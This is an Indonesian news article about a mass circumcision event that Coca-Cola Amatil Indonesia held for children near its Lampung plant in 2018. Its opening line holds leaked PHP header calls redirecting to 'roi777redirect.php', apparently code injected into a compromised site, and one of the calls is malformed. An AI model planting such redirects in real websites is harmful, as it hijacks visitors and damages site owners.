header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); CCAI Gelar Sunatan Masal Mewujudkan Harapan Masyarakat Sekitar Pabrik di Lampung -
CCAI Gelar Sunatan Masal Mewujudkan Harapan Masyarakat Sekitar Pabrik di Lampung

Teguh Widodo Plant Operation Manager SSO Lampung Plant ditengah-tengah keluarga dan anak-anak peserta sunatan massal warga sekitar pabrik Coca-Cola Amatil Indonesia Lampung

 

TRANSLAMPUNG.COM – Hari ini Senin 9 Juli 2018, dimulai pukul 09.00 bertempat di Auditorium Pabrik Coca-Cola Amatil Indonesia Lampung, kami menggelar silaturahmi bersama warga sekitar pabrik dan kegiatan Sunatan Masal bagi anak-anak warga yang tinggal disekitar pabrik Coca-Cola Amatil Indonesia.

Ungkapan rasa syukur disampaikan Mulyono orang tua Ferry Setiawan salah satu anak peserta sunatan massal yang di gagas Coca-Cola Amatil Indonesia, Forum Pendidik Sukanegara dan R.S Advent Bandar Lampung, menurutnya kegiatan ini dapat mengurangi beban ekonomi bagi kami warga disekitar kawasan industri pabrik Tanjung Bintang.

Orang tua dan anak-anak warga zone 1 telah berkumpul dengan antusias antri dengan tertib menunggu giliran mendapatkan layanan sunatan massal yang dilakukan oleh para dokter dan tenaga medis dari R.S. Advent Bandar Lampung.  Otot Sudarmono Manager Marketing R.S. Advent Bandar Lampung dalam sambutannya mewakili pimpinan menyatakan timnya hadir membantu kegiatan masyarakat Desa Sukanegara mewujudkan harapan keluarga dan anak anak sekitar pabrik Coca-Cola Amatil Indonesia di Tanjung Bintang untuk mendapatkan layanan terbaik, ditambahkannya…kami sangat bangga menjadi bagian dalam kolaborasi tim bersama Coca-Cola Amatil Indonesia dan Forum Pendidik Sukanegara hari ini.

Dalam keterangan pers ini Apendi Ketua Forum Pendidik Sukanegara menyatakan Layanan sunatan massal kali ini diikuti oleh 26 orang peserta, anak anak usia rata-rata 7 tahun dan memiliki keinginan yang kuat untuk disunat, kami sangat berterimakasih kepada Coca-Cola Amatil Indonesia yang memiliki komitment kuat untuk mendorong tumbuh dan berkembangnya masyarakat sekitar pabrik ini.

Yayan Sopian CA Regional Manager West Indonesia, senang dan memberikan apresiasi melihat kemandirian semangat dan antusias warga sekitar pabrik Coca-Cola Amatil Indonesia di Lampung…semoga silaturahmi ini akan semakin meningkatkan kualitas hubungan kolaborasi dunia usaha dan berbagai lapisan maysarakat.  Kami bangga jadi bagian dari warga Desa Sukanegara untuk bisa terus tumbuh dan berkembang. Hal ini  sesuai dengan visi CCAI untuk menciptakan momen kebahagiaan, bermanfaat dan memberikan kebahagiaan kepada masyarakat. Kegiatan ini merupakan salah satu dukungan inisiatif pengembangan masyarakat sekitar pabrik kami di Lampung.

Sunatan Masal Coca-Cola Amatil Indonesia di buka oleh Teguh Widodo Plant Operation Manager SSO Lampung Hadir dalam kesempatan ini, Ketua Karang Taruna, Otot Sudarmono RS Advent Bandar Lampung, Ketua Forum Pendidik Sukanegaradan tokoh masyarakat di sekitar pabrik Coca-Cola Amatil Indonesia.(*)

News Reporter